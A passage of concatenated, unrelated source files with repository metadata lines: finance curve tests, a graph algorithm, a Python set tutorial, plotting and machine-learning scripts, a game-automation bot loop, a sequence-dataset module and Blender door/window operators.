    assert [round(x, 4) for x in zero_rates] == [
        0.02, 0.0377, 0.0344, 0.0349, 0.0357]

    beta1 = 0.05
    curve3 = DiscountCurveNSS(start_date,
                              beta1, beta2, beta3, beta4, tau1, tau2)
    zero_rates = curve3.zero_rate(dates)
    assert [round(x, 4) for x in zero_rates] == [
        0.03, 0.0476, 0.0443, 0.0447, 0.0455]

    beta1 = 0.06
    curve4 = DiscountCurveNSS(start_date,
                              beta1, beta2, beta3, beta4, tau1, tau2)
    zero_rates = curve4.zero_rate(dates)
    assert [round(x, 4) for x in zero_rates] == [
        0.04, 0.0574, 0.0541, 0.0546, 0.0554]

    beta1 = 0.07
    curve5 = DiscountCurveNSS(start_date,
                              beta1, beta2, beta3, beta4, tau1, tau2)
    zero_rates = curve5.zero_rate(dates)
    assert [round(x, 4) for x in zero_rates] == [
        0.05, 0.0673, 0.064, 0.0644, 0.0652]
| domokane/FinancePy | tests/test_FinDiscountCurveNSS.py | test_FinDiscountCurveNSS.py | py | 2,689 | python | en | code | 1,701 | github-code | 13 |
39018875242 | from cmath import inf
from typing import List
from collections import defaultdict
from sympy import deg
class Solution:
    """Minimum degree of a connected trio in an undirected graph.

    A trio is a triangle of three mutually connected nodes; its degree is
    the number of edges leaving the triangle, i.e. sum of node degrees - 6.
    """

    def minTrioDegree(self, n: int, edges: List[List[int]]) -> int:
        """Brute-force over adjacency sets; returns -1 when no trio exists."""
        adjacency = defaultdict(set)
        for a, b in edges:
            adjacency[a].add(b)
            adjacency[b].add(a)

        best = inf
        for a in adjacency:
            for b in adjacency[a]:
                for c in adjacency[b]:
                    # Triangle check: c must see both a and b.
                    if a in adjacency[c] and b in adjacency[c]:
                        trio_degree = (
                            len(adjacency[a]) + len(adjacency[b]) + len(adjacency[c]) - 6
                        )
                        best = min(best, trio_degree)
        return -1 if best == inf else best

    def minToDegreeTwo(self, n: int, edges: List[List[int]]) -> int:
        """Faster variant: store each edge once (low -> high) to halve the scan."""
        forward = defaultdict(set)
        degree = defaultdict(int)
        for a, b in edges:
            forward[min(a, b)].add(max(a, b))
            degree[a] += 1
            degree[b] += 1

        best = inf
        for a in forward:
            for b in forward[a]:
                if b not in forward:
                    continue
                for c in forward[b]:
                    if c in forward[a]:
                        best = min(best, degree[a] + degree[b] + degree[c] - 6)
        return -1 if best == inf else best
# return 0
# Ad-hoc driver. NOTE(review): `n` is unused by both implementations
# (they derive the node set from `edges`), so n = 0 is harmless here.
n = 0
edges = [[1, 2], [1, 3], [3, 2], [4, 1], [5, 2], [3, 6]]
# print(Solution().minTrioDegree(n, edges))
print(Solution().minToDegreeTwo(n, edges))
| sarveshbhatnagar/CompetetiveProgramming | connected_trio.py | connected_trio.py | py | 1,515 | python | en | code | 0 | github-code | 13 |
42654542052 | # add function
# Demo of Python set methods: add / remove / discard / copy / clear,
# plus the mathematical union and intersection operators.
my_set = {1, 2, 3, 4, 5}
print(my_set)
# add a value, successful
my_set.add(6)
print(my_set)
# add a duplicate value: no effect, but doesn't throw an error.
my_set.add(6)
print(f"Doesn't add 6 again, {my_set} ")
# remove function
# successful if element is in the set.
my_set.remove(3)
print(f"Removing 3, {my_set}")
# # throws error if not present in set.
# my_set.remove(3)
# If we don't want it to throw an error if it doesn't exist, discard method can be used.
my_set.discard(3) # doesn't throw an error.
# successful removal.
my_set.discard(1)
# Shallow copy; mutating the copy leaves my_set untouched.
copy_of_set = my_set.copy()
set_new = set([1, 2, 3, 4, 5])
set_new.clear()
# clears the set.
print(set_new)
# Mathematical set methods
math_students = {"Abhinav", "Manish", "Dhruv"}
science_students = {"Akash", "Abhinav", "Lekhraj", "Manish"}
# Getting union of a set.
print(math_students | science_students)
# Intersection of a set.
print(math_students & science_students)
| abhinav-m/python-playground | tutorials/basics/data-structures/tuples_and_sets/set_methods.py | set_methods.py | py | 950 | python | en | code | 0 | github-code | 13 |
12365892372 | from PIL import Image
import math
import colorsys
import random
from time import sleep
class WaterPlayer:
    """Animated water-caustics effect.

    Two copies of the same 32x32 caustics tile scroll independently; for each
    screen pixel the darker (min) of the two samples is drawn into the blue
    channel, producing the classic interference-like water shimmer.
    """

    def __init__(self, width,height):
        # Output surface dimensions in pixels.
        self.width = width
        self.height = height
        # Shared caustics tile, resized to 32x32; sampled with wrap-around.
        self.caustic = Image.open("../assets/caustics-texture.gif").resize((32,32))
        # Layer 1: random scroll velocity, origin, and sampling scale.
        self.vec1 =[random.uniform(-0.2,0.2),random.uniform(-0.1,0.1)]
        self.pos1 = [0,0]
        self.size1 = random.random() + 0.5
        # Layer 2: independently randomized so the two layers drift apart.
        self.vec2 =[random.uniform(-0.5,0.5),random.uniform(-0.1,0.1)]
        self.pos2 = [0,0]
        self.size2 = random.random() + 0.5

    def update(self, screen, time):
        """Advance both layers one step and redraw the whole screen.

        NOTE(review): the `time` argument is currently unused — confirm
        whether it was meant to drive the animation instead of per-call steps.
        """
        # Scroll each layer by its velocity, scaled by its sampling size.
        self.pos1[0] += self.vec1[0] * self.size1
        self.pos1[1] += self.vec1[1] * self.size1
        self.pos2[0] += self.vec2[0] * self.size2
        self.pos2[1] += self.vec2[1] * self.size2
        for x in range (self.width):
            for y in range(self.height):
                # Sample each layer with modulo wrap over the 32x32 tile.
                c1 =self.caustic.getpixel(((self.pos1[0]+x*self.size1)%self.caustic.size[0],(self.pos1[1]+y*self.size1) % self.caustic.size[1] ))
                c2 =self.caustic.getpixel(((self.pos2[0]+x*self.size2)%self.caustic.size[0],(self.pos2[1]+y*self.size2) % self.caustic.size[1] ))
                # Blue channel only: 32 base + darker of the two samples, capped at 255.
                screen.write_pixel(x,y,0,0,32+min(255,min(c1,c2)))
def main():
    """Render the water effect onto a FakeScreen for 1000 frames (~100 s)."""
    from fake_screen import FakeScreen

    width, height = 10, 15
    player = WaterPlayer(width, height)
    screen = FakeScreen(width, height)
    for frame in range(1000):
        player.update(screen, frame / 10)
        screen.show()
        sleep(0.1)


if __name__ == "__main__":
    main()
| andrewdyersmith/pingpongpi | daemon/water_player.py | water_player.py | py | 1,504 | python | en | code | 0 | github-code | 13 |
21850111552 | import util as ut
import xarray as xr
import absplots as apl
def main():
"""Main program called during execution."""
# initialize figure
fig, grid = apl.subplots_mm(
figsize=(135, 115), nrows=2, ncols=4, gridspec_kw=dict(
left=2.5, right=17.5, bottom=2.5, top=2.5, wspace=2.5, hspace=2.5),
subplot_kw=dict(projection=ut.pl.proj))
cax = fig.add_axes_mm([120, 2.5, 5, 110])
# loop on records
for i, rec in enumerate(ut.ciscyc_hr_records):
# open postprocessed output
ds = xr.load_dataset(
'../data/processed/ciscyc.5km.{}.ex.1ka.nc'.format(rec.lower()))
# plot
innerlevs = [l for l in range(200, 5000, 200) if l % 1000 != 0]
outerlevs = [l for l in range(200, 5000, 200) if l % 1000 == 0]
for j, age in enumerate([16, 14, 12, 10]):
ax = grid[i, j]
ax.set_rasterization_zorder(2.5)
snap = ds.sel(age=age)
snap.topg.plot.imshow(
ax=ax, add_colorbar=False, cmap=ut.topo_cmap,
norm=ut.topo_norm, zorder=-1)
snap.topg.plot.contour(
ax=ax, levels=[0], colors='0.25', linewidths=0.25, zorder=0)
snap.thk.notnull().plot.contour(
ax=ax, colors='0.25', levels=[0], linewidths=0.5)
(snap.topg+snap.thk).plot.contour(
ax=ax, colors='0.25', levels=innerlevs, linewidths=0.1)
(snap.topg+snap.thk).plot.contour(
ax=ax, colors='0.25', levels=outerlevs, linewidths=0.25)
((snap.uvelsurf**2+snap.vvelsurf**2)**0.5).plot.imshow(
ax=ax, alpha=0.75, cbar_ax=cax,
cmap=ut.vel_cmap, norm=ut.vel_norm, cbar_kwargs=dict(
label=r'Surface velocity ($m\,a^{-1}$)',))
# add map elements
ax.set_title('')
ut.pl.draw_natural_earth(ax)
ut.pl.add_corner_tag(ax, '{} ka'.format(age))
# add profile lines
for k, yp in enumerate([1.7e6, 1.4e6, 1.1e6, 0.8e6]):
ax.plot([-2.4e6, -1.25e6], [yp, yp], 'k|',
lw=0.25, ls='--', dashes=(2, 2))
if j == 3:
ax.text(-1.2e6, yp, chr(65+k), ha='left', va='bottom')
# add record label
ut.pl.add_corner_tag(ax, rec.upper(), va='bottom')
# add colorbar and save
ut.pl.savefig(fig)
if __name__ == '__main__':
main()
| juseg/cordillera | figures/ciscyc_hr_deglacshots.py | ciscyc_hr_deglacshots.py | py | 2,467 | python | en | code | 0 | github-code | 13 |
14379602352 | """Contains methods for loading data in various way."""
import tensorflow as tf
import download_and_convert as dc
import data_utils
# The default directory where the temporary files and the TFRecords are stored.
_DATA_DIR = 'data'
def load_data_numpy():
    """Get the data in ndarray format.

    Returns:
        None for now — exporting the (train, validation, test) splits as
        ndarrays is not implemented yet.
    """
    # TODO: implement ndarray export of the TFRecord datasets.
    return None
def load_data_tfdataset():
    """Get the train/dev/test data as decoded tf.data datasets.

    Returns:
        A (train, dev, test) tuple of TFRecord-backed datasets whose
        records are decoded to tensors via data_utils.read_tfrecord.
    """
    # Fetch/unpack the source files and convert them to TFRecords if needed.
    dc.run(_DATA_DIR)

    def _load_split(split):
        # One TFRecordDataset per split, decoded record-by-record.
        records = tf.data.TFRecordDataset(dc.get_tfrecord_filename(_DATA_DIR, split))
        return records.map(data_utils.read_tfrecord)

    return _load_split('train'), _load_split('dev'), _load_split('test')
21332910639 | import matplotlib.pyplot as plt
import numpy as np
import os
import keras
from tensorflow.keras import layers
from PIL import Image
import tensorflow as tf
import tensorflow_addons as tfa
# --- Data: 80/20 train/validation split from one labeled image folder ------
train_ds = tf.keras.utils.image_dataset_from_directory(
    'sortedPics/forTraining',
    label_mode='categorical',
    validation_split=0.2,
    image_size=(160,160),
    subset="training",
    seed=123,
    batch_size=64)
val_ds = tf.keras.utils.image_dataset_from_directory(
    'sortedPics/forTraining',
    label_mode='categorical',
    validation_split=0.2,
    image_size=(160,160),
    subset="validation",
    seed=123,
    batch_size=64)
class_names = train_ds.class_names
AUTOTUNE = tf.data.AUTOTUNE
train_ds = train_ds.prefetch(buffer_size=AUTOTUNE)
val_ds = val_ds.prefetch(buffer_size=AUTOTUNE)
size = (160, 160)
# --- Phase 1: frozen ResNet50 backbone + new softmax head ------------------
#MODEL 2-STANDARD, lr=0.001 epochs=50/10, opt=adam,
# Augmentation layers (flip + rotation) run only during training.
resnet_model7 = tf.keras.Sequential([tf.keras.layers.RandomFlip('vertical'),
                                     tf.keras.layers.RandomRotation(0.2),])
pretrained_model= tf.keras.applications.ResNet50(include_top=False,
                   input_shape=(160,160,3),
                   pooling='avg',classes=10,
                   weights='imagenet')
# Freeze the whole backbone for the head-only warm-up phase.
for layer in pretrained_model.layers:
        layer.trainable=False
resnet_model7.add(pretrained_model)
base_learning_rate=0.0001
resnet_model7.add(tf.keras.layers.Dense(10, activation='softmax'))
resnet_model7.compile(
    optimizer=tf.keras.optimizers.Adam(learning_rate=base_learning_rate),
    loss=tfa.losses.SigmoidFocalCrossEntropy(from_logits=False),
    metrics=['accuracy'],
)
initial_epochs = 8
history=resnet_model7.fit(train_ds, epochs=initial_epochs, validation_data=val_ds)
resnet_model7.save("RNm7PreTune")
resnet_model7.save("RNm7PreTune.h5")
# --- Plot phase-1 accuracy/loss curves -------------------------------------
#create graph
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs_range = range(initial_epochs)
plt.figure(figsize=(8, 8))
plt.subplot(1, 2, 1)
plt.plot(epochs_range, acc, label='Training Accuracy')
plt.plot(epochs_range, val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(1, 2, 2)
plt.plot(epochs_range, loss, label='Training Loss')
plt.plot(epochs_range, val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.savefig("RNm7PreFineTune.jpg")
# --- Phase 2: unfreeze the top of the backbone and fine-tune at lr/10 ------
#fine-tuning
pretrained_model.trainable = True
# Fine-tune from this layer onwards
fine_tune_at = 115
# Freeze all the layers before the `fine_tune_at` layer
for layer in pretrained_model.layers[:fine_tune_at]:
    layer.trainable = False
#set up callback for early stopping
callback = tf.keras.callbacks.EarlyStopping(monitor='loss', patience=3, restore_best_weights=True)
resnet_model7.compile(loss=tfa.losses.SigmoidFocalCrossEntropy(from_logits=False),
              optimizer = tf.keras.optimizers.Adam(learning_rate=base_learning_rate/10),
              metrics=['accuracy'])
fine_tune_epochs = 10
total_epochs = initial_epochs + fine_tune_epochs
history_fine = resnet_model7.fit(train_ds,
                         epochs=total_epochs, callbacks=[callback],
                         initial_epoch=history.epoch[-1],
                         validation_data=val_ds)
resnet_model7.save("RNm7PostTune")
resnet_model7.save("RNm7PostTune.h5")
# --- Plot combined curves with a marker where fine-tuning started ----------
#create graph
acc += history_fine.history['accuracy']
val_acc += history_fine.history['val_accuracy']
loss += history_fine.history['loss']
val_loss += history_fine.history['val_loss']
plt.figure(figsize=(8, 8))
plt.subplot(2, 1, 1)
plt.plot(acc, label='Training Accuracy')
plt.plot(val_acc, label='Validation Accuracy')
plt.ylim([0.8, 1])
plt.plot([initial_epochs-1,initial_epochs-1],
          plt.ylim(), label='Start Fine Tuning')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(2, 1, 2)
plt.plot(loss, label='Training Loss')
plt.plot(val_loss, label='Validation Loss')
plt.ylim([0, 1.0])
plt.plot([initial_epochs-1,initial_epochs-1],
          plt.ylim(), label='Start Fine Tuning')
plt.legend(loc='upper right')
plt.title('Training and Validation Loss')
plt.xlabel('epoch')
plt.savefig("RNm7PostFineTune.jpg") | nmayerfeld/summerProject | Model7.py | Model7.py | py | 4,160 | python | en | code | 2 | github-code | 13 |
28389641522 | import sys, os, time
PACKAGE_PARENT = '../..'
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
from master_bot.master import Bot as runeBot
# Bot entry point: the project root is passed so master.Bot can locate assets.
player = runeBot(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
# Open the bank once before entering the smelting loop.
player.selectThing("bank",offset=[7,2])
time.sleep(2)
# Main loop: withdraw bars, smelt at the furnace, wait out smelting, re-bank.
# NOTE(review): the sleep durations appear tuned to in-game animation and
# smelting times — confirm before changing.
while True:
    player.clickMouse("down",spaces=0.5)
    time.sleep(0.5)
    player.selectThing("blast/steel")
    player.selectThing("furnace", offset=[-4.5,0])
    time.sleep(10.4)
    player.clickMouse("right",spaces=3)
    time.sleep(0.4)
    player.simulateKey("space")
    # Wait for the full batch to finish smelting.
    time.sleep(155)
    player.selectThing("bank",offset=[7,2])
    time.sleep(11)
| SimSam115/orsr_bbb | tests/usingMaster_bot/cannonballMaker.py | cannonballMaker.py | py | 762 | python | en | code | 0 | github-code | 13 |
29831260945 | import numpy as np
import torch
from collections import defaultdict
import string
from sequence.data import traits
from enum import IntEnum
from typing import List, Dict, Optional, Union, Sequence
import functools
def lazyprop(fn):
    """Decorator: read-only property whose value is computed once per instance.

    The first access calls ``fn`` and caches the result on the instance
    under ``_lazy_<name>``; later accesses return the cached value.
    """
    cache_attr = "_lazy_" + fn.__name__

    @property
    @functools.wraps(fn)
    def wrapper(self):
        if not hasattr(self, cache_attr):
            setattr(self, cache_attr, fn(self))
        return getattr(self, cache_attr)

    return wrapper
class Tokens(IntEnum):
    """Reserved vocabulary indexes. The models depend on these exact values."""
    EOS = 0      # end-of-sequence
    SOS = 1      # start-of-sequence
    UNKNOWN = 2  # out-of-vocabulary token
class Language:
    """
    The vocabulary of a dataset. This will map the unique strings to indexes that map to the embeddings.
    You can also provide custom embeddings object.
    """

    def __init__(
        self,
        words: Optional[List[str]] = None,
        lower: bool = True,
        remove_punctuation: bool = True,
        custom_embeddings: Optional[np.ndarray] = None,
    ):
        """
        Parameters
        ----------
        words
            Unique words in the dataset
        lower
            Lower the string: str.lower()
        remove_punctuation
            !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ will be removed
        custom_embeddings
            Shape(num_embeddings, embedding_dim)
        """
        self.lower = lower
        self.remove_punctuation = remove_punctuation
        if remove_punctuation:
            # Translation table mapping every punctuation char to None.
            self.translation_table = str.maketrans("", "", string.punctuation)
        else:
            self.remove_punctuation = False

        # Warning. Don't change index 0, 1, and 2
        # These are used in the models!
        self.w2i: Dict[str, int] = {
            "EOS": Tokens.EOS,
            "SOS": Tokens.SOS,
            "UNKNOWN": Tokens.UNKNOWN,
        }
        if words is not None:
            self.register(words)
        self.custom_embeddings = self.init_custom_emb(custom_embeddings)

    @staticmethod
    def init_custom_emb(
        custom_embeddings: Optional[torch.Tensor],
    ) -> Optional[np.ndarray]:
        """Prepend one-hot rows for EOS/SOS/UNKNOWN to user embeddings.

        Returns a float32 torch tensor of shape
        (num_embeddings + 3, embedding_dim), or None when no custom
        embeddings were given.
        """
        if custom_embeddings is not None:
            # we need to concat 3 embeddings for EOS, SOS and UNKNOWN
            _, emb_dim = custom_embeddings.shape
            pre = np.zeros((3, emb_dim))
            # One-hot encode the three special tokens. TODO: maybe something smarter?
            # NOTE: requires emb_dim >= 3, otherwise the indexing below fails.
            pre[0, 0] = 1
            pre[1, 1] = 1
            pre[2, 2] = 1
            return torch.tensor(
                np.concatenate((pre, custom_embeddings), axis=0), dtype=torch.float32
            )
        return None

    def clean(self, word: str) -> str:
        """
        Transform str to lowercase and optionally remove punctuation
        """
        if self.lower:
            word = word.lower()
        if self.remove_punctuation:
            # Make a translation table when given 3 args.
            # All punctuation will be mapped to None
            word = word.translate(self.translation_table)
        return word

    def register(self, words: List[str]):
        """Register every word in `words` (list comp used for side effects only)."""
        [self.register_single_word(w) for w in words]

    def register_single_word(self, word: str):
        """
        Register words as indexes

        Parameters
        ----------
        word
            unique word
        """
        c = self.clean(word)
        if len(c) > 0:
            # Next free index; assumes `word` was not registered before.
            self.w2i[c] = len(self.w2i)

    @lazyprop
    def i2w(self) -> Dict[int, Optional[str]]:
        # Inverse mapping index -> word; missing indexes resolve to None.
        # Cached once per instance by @lazyprop.
        d: Dict[int, Optional[str]] = defaultdict(lambda: None)
        d.update({v: k for k, v in self.w2i.items()})
        return d

    @property
    def vocabulary_size(self) -> int:
        return len(self.w2i)

    @property
    def words(self) -> List[str]:
        return list(self.w2i.keys())

    def translate_batch(self, padded: torch.Tensor) -> np.ndarray:
        """
        Parameters
        ----------
        padded : torch.Tensor
            Tensor with word indexes. Shape: (seq_len, batch)

        Returns
        -------
        out : np.Array[int]
            Array with matching words. Shape: (seq_len, batch)
        """
        # Only eval once
        d = self.i2w
        # NOTE(review): this mutates the lazily-cached i2w dict, permanently
        # mapping the -1 padding index to "" — appears intentional; confirm.
        d[-1] = ""
        if hasattr(padded, "cpu"):
            padded = padded.cpu().data.numpy()
        return np.vectorize(d.get)(padded)

    def __getitem__(self, item: Union[int, str]) -> Union[int, str]:
        # int -> word, str -> index (str lookup is NOT cleaned first).
        if isinstance(item, int):
            return self.i2w[item]
        else:
            return self.w2i[item]

    def __contains__(self, item: Union[int, str]) -> bool:
        # Membership: strings are cleaned before lookup, ints are not.
        if isinstance(item, str):
            return self.clean(item) in self.w2i
        else:
            return item in self.i2w
class Dataset(
    traits.Query, traits.TransitionMatrix, traits.Transform, traits.DatasetABC
):
    """
    Dataset used in training. This has some lazy operations due to dask usage.
    """

    def __init__(
        self,
        sentences: List[List[str]],
        language: Optional[Language],
        skip: Sequence[str] = (),
        buffer_size: int = int(1e4),
        max_len: int = None,
        min_len: int = 1,
        device: str = "cpu",
        chunk_size: Union[int, str] = "auto",
        allow_con_dup: bool = True,
    ):
        """
        Parameters
        ----------
        sentences : list[list[str]]
            [["hello", "world!"], ["get", "down!"]]
        language : sequence.data.utils.Language
            Required. Should be the language fitted for training.
        skip : list[str]
            Words to skip.
        buffer_size : int
            Size of chunks prepared by lazy generator.
            Only used during preparation of dataset.
        max_len : int
            Max sequence length.
        min_len : int
            Min sequence length.
        device : str
            'cuda' | 'cpu'
        chunk_size : str/ int
            Passed to dask array.
        allow_con_dup : bool
            Filter sequences from consecutive duplicates
        """
        # Behavior is composed from the trait mixins; each one is
        # initialized explicitly with this instance as parent.
        language = Language() if language is None else language
        traits.DatasetABC.__init__(self, self, language=language, device=device)
        traits.Query.__init__(self, self)
        traits.TransitionMatrix.__init__(self, self)
        traits.Transform.__init__(
            self,
            parent=self,
            buffer_size=buffer_size,
            min_len=min_len,
            max_len=max_len,
            chunk_size=chunk_size,
            sentences=sentences,
            skip=skip,
            allow_con_dup=allow_con_dup,
        )

    def split(self, fracs, shuffle=True):
        """
        Split dataset in [train, test, ..., val] Datasets.

        Parameters
        ----------
        fracs : Sequence
            Fractions per split; must sum to 1.
        shuffle : bool

        Returns
        -------
        datasets : tuple[Dataset]
            A new Dataset object for every fraction in fracs
        """
        idx = np.arange(len(self.data))
        # Empty shells sharing this dataset's language; state is copied below.
        dsets = tuple(Dataset(None, language=self.language) for _ in fracs)
        fracs = np.array([0] + fracs)
        assert fracs.sum() == 1
        if shuffle:
            # NOTE(review): `idx` is shuffled but never used afterwards —
            # the slices below are contiguous, so `shuffle` currently has
            # no effect. Possibly should be `self.data[idx[i:j]]`; confirm.
            np.random.shuffle(idx)
        slice_idx = np.cumsum(fracs * len(self.data)).astype(int)
        slice_idx = [(i, j) for i, j in zip(slice_idx[:-1], slice_idx[1:])]
        for (i, j), ds in zip(slice_idx, dsets):
            # Copy all attributes, then override the data slice per split.
            ds.__dict__.update(self.__dict__)
            ds.data = self.data[i:j]
            ds.set_idx()
        return dsets
class ArrayWrap(np.ndarray):
    """np.ndarray subclass exposing a dask-like ``compute()`` method.

    Lets eagerly-computed numpy data be used interchangeably with dask
    arrays: ``compute()`` is a no-op returning the array itself, unless a
    custom callable is supplied via ``attr``.
    See: https://docs.scipy.org/doc/numpy-1.13.0/user/basics.subclassing.html
    """

    def __new__(cls, input_array, attr=None):
        obj = np.asarray(input_array).view(cls)
        # Bug fix: only override the default identity ``compute`` (set in
        # __array_finalize__) when a custom callable is given. Previously
        # ``obj.compute = attr`` unconditionally reset it to None, so the
        # common ``ArrayWrap(x).compute()`` raised TypeError.
        if attr is not None:
            obj.compute = attr
        return obj

    def __array_finalize__(self, obj):
        if obj is None:
            return
        # Default: computing an eager array just returns it.
        self.compute = lambda: self
class DatasetEager(Dataset):
    """
    The eager variation of Dataset. This class doesn't use Dask.
    """

    def __init__(
        self,
        sentences: List[List[str]],
        language: Optional[Language] = None,
        skip: Sequence[str] = (),
        buffer_size: int = int(1e4),
        max_len: Optional[int] = None,
        min_len: int = 1,
        device: str = "cpu",
        chunk_size: str = "auto",
    ):
        # Same signature as Dataset; simply forwards (no allow_con_dup here).
        super().__init__(
            sentences=sentences,
            language=language,
            skip=skip,
            buffer_size=buffer_size,
            max_len=max_len,
            min_len=min_len,
            device=device,
            chunk_size=chunk_size,
        )

    def transform_data(self):
        """Materialize all paths into one padded integer array eagerly.

        Builds the data in `buffer_size` chunks via the inherited `_gen`,
        then drops padded-out (empty) rows and wraps the result in ArrayWrap
        so it keeps a dask-compatible ``compute()`` interface.
        """
        if self.max_len is None:
            self.max_len = max(map(len, self.paths))
        size = len(self.paths)
        array = []
        # Generate in buffer-sized windows to bound peak memory.
        for i, j in zip(
            range(0, size, self.buffer_size),
            range(self.buffer_size, size + self.buffer_size, self.buffer_size),
        ):
            array.append(self._gen(i, j, size))
        self.data = np.concatenate(array)

        # Because of transformation conditions there can be empty sequences
        # These need to be removed.
        # The actual computed values are a bit shorter.
        # Because the data rows % buffer_size has a remainder.
        # A fully-padded row (all -1) sums to exactly -(max_len + 1).
        mask_short = self.data.sum(-1) == -(self.max_len + 1)
        mask = np.ones(shape=(self.data.shape[0],), dtype=bool)
        mask[: mask_short.shape[0]] = mask_short
        self.data = ArrayWrap(self.data[~mask])
        self.set_idx()
class DatasetInference(traits.Query, traits.Transform, traits.DatasetABC):
    """
    Dataset used during inference.
    """
    def __init__(
        self,
        sentences: List[List[str]],
        language: Language,
        buffer_size: int = int(1e4),
        max_len: Optional[int] = None,
        min_len: int = 1,
        device: str = "cpu",
        chunk_size: str = "auto",
    ):
        # Unlike the training Dataset, inference never skips tokens,
        # never allows consecutive duplicates and never masks.
        traits.DatasetABC.__init__(self, self, language=language, device=device)
        traits.Query.__init__(self, self)
        traits.Transform.__init__(
            self,
            parent=self,
            buffer_size=buffer_size,
            min_len=min_len,
            max_len=max_len,
            chunk_size=chunk_size,
            sentences=sentences,
            skip=(),
            allow_con_dup=False,
            mask=False,
        )
    def transform_sentence(self, s: List[str]) -> np.ndarray:
        """
        Transform sentence of string to integers.
        This method is different from the one in training because we
        don't want to add new words to the language. Unknown words will
        be added to UNKNOWN.
        Parameters
        ----------
        s : list[str]
            A sequence of any length.
        Returns
        -------
        s : np.array[int]
            A -1 padded sequence of shape (self.max_len, )
        """
        assert self.max_len is not None
        # Clean every word and drop those that become empty.
        s = list(filter(lambda x: len(x) > 0, [self.language.clean(w) for w in s]))
        # All the sentences are -1 padded
        idx = np.ones(self.max_len + 1) * -1
        last_w = None
        if len(s) > self.max_len or len(s) < self.min_len:
            # prevents returning an IndexError during inference
            idx[0] = Tokens.SOS
            idx[1] = Tokens.EOS
            # will be removed jit
            return idx
        i = -1
        for w in s:
            # Optionally collapse consecutive duplicates (attribute set by
            # traits.Transform via allow_con_dup).
            if not self.allow_duplicates:
                if w == last_w:
                    last_w = w
                    continue
                last_w = w
            # Only increment if we don't continue
            i += 1
            if w not in self.language.w2i:
                w = Tokens.UNKNOWN.name
            idx[i] = self.language.w2i[w]
            # NOTE(review): idx[i + 1] = 0 appears to terminate the sequence
            # after the last word — presumably 0 is the EOS id; confirm
            # against the Tokens enum.
            idx[i + 1] = 0
        return np.array(idx)
| ritchie46/sequence | sequence/data/utils.py | utils.py | py | 11,796 | python | en | code | 10 | github-code | 13 |
8093465008 | import bpy
import os
import subprocess
import codecs
from . import paths_doors_windows
from . import utils_doors_windows
from pc_lib import pc_types, pc_unit, pc_utils
def get_current_view_rotation(context):
    '''
    Gets the current view rotation for creating thumbnails

    Searches every open window/area for the first 3D viewport and returns
    its region view_rotation (a mathutils.Quaternion).

    NOTE(review): the fallback return value is a plain (0, 0, 0) tuple,
    while the success path returns a Quaternion — callers that invoke
    .to_euler() on the result would fail on the fallback; confirm a 3D
    viewport is always present when this is called.
    '''
    for window in context.window_manager.windows:
        screen = window.screen
        for area in screen.areas:
            if area.type == 'VIEW_3D':
                for space in area.spaces:
                    if space.type == 'VIEW_3D':
                        return space.region_3d.view_rotation
    return (0,0,0)
class doors_windows_OT_create_new_door_window_asset(bpy.types.Operator):
    bl_idname = "doors_windows.create_new_asset"
    bl_label = "Create New Asset"
    bl_description = "This will create a new asset of the specified type"

    # Which asset skeleton to build; one of ENTRY_DOOR_FRAME,
    # ENTRY_DOOR_PANEL, WINDOW_FRAME, WINDOW_INSERT.
    asset_type: bpy.props.StringProperty(name="Asset Type",description="Type of Asset to Create")

    def execute(self, context):
        """Create an empty pc_types.Assembly sized for the chosen asset type,
        add its driving prompts, and make it the active/selected object."""
        if self.asset_type == 'ENTRY_DOOR_FRAME':
            assembly = pc_types.Assembly()
            assembly.create_assembly("Entry Door Frame")
            # Default 36" x 6" x 90" frame envelope.
            assembly.obj_x.location.x = pc_unit.inch(36)
            assembly.obj_y.location.y = pc_unit.inch(6)
            assembly.obj_z.location.z = pc_unit.inch(90)
            assembly.obj_bp.select_set(True)
            assembly.add_prompt("Door Frame Width",'DISTANCE',pc_unit.inch(3))
            context.view_layer.objects.active = assembly.obj_bp
        if self.asset_type == 'ENTRY_DOOR_PANEL':
            assembly = pc_types.Assembly()
            assembly.create_assembly("Entry Door Panel")
            assembly.obj_x.location.x = pc_unit.inch(36)
            assembly.obj_y.location.y = pc_unit.inch(1.5)
            assembly.obj_z.location.z = pc_unit.inch(90)
            assembly.obj_bp.select_set(True)
            assembly.add_prompt("Hide",'CHECKBOX',False)
            # X1/X2 empties track the panel extents even when dim_x is
            # negative (door opening mirrored).
            dim_x = assembly.obj_x.pyclone.get_var('location.x','dim_x')
            x1 = assembly.add_empty('X1')
            x1.empty_display_size = .01
            x1.pyclone.loc_x('IF(dim_x>0,0,dim_x)',[dim_x])
            x2 = assembly.add_empty('X2')
            x2.empty_display_size = .01
            x2.pyclone.loc_x('IF(dim_x>0,dim_x,0)',[dim_x])
            context.view_layer.objects.active = assembly.obj_bp
        if self.asset_type == 'WINDOW_FRAME':
            assembly = pc_types.Assembly()
            assembly.create_assembly("Window Frame")
            # assembly.obj_bp.location.z = pc_unit.inch(48)
            assembly.obj_x.location.x = pc_unit.inch(36)
            assembly.obj_y.location.y = pc_unit.inch(6)
            assembly.obj_z.location.z = pc_unit.inch(48)
            assembly.obj_bp.select_set(True)
            # One width prompt per side of the window frame.
            assembly.add_prompt("Left Window Frame Width",'DISTANCE',pc_unit.inch(3))
            assembly.add_prompt("Right Window Frame Width",'DISTANCE',pc_unit.inch(3))
            assembly.add_prompt("Top Window Frame Width",'DISTANCE',pc_unit.inch(3))
            assembly.add_prompt("Bottom Window Frame Width",'DISTANCE',pc_unit.inch(3))
            context.view_layer.objects.active = assembly.obj_bp
        if self.asset_type == 'WINDOW_INSERT':
            assembly = pc_types.Assembly()
            assembly.create_assembly("Window Insert")
            # assembly.obj_bp.location.z = pc_unit.inch(48)
            assembly.obj_x.location.x = pc_unit.inch(36)
            assembly.obj_y.location.y = pc_unit.inch(6)
            assembly.obj_z.location.z = pc_unit.inch(48)
            assembly.obj_bp.select_set(True)
        return {'FINISHED'}
class doors_windows_OT_add_handle_to_scene(bpy.types.Operator):
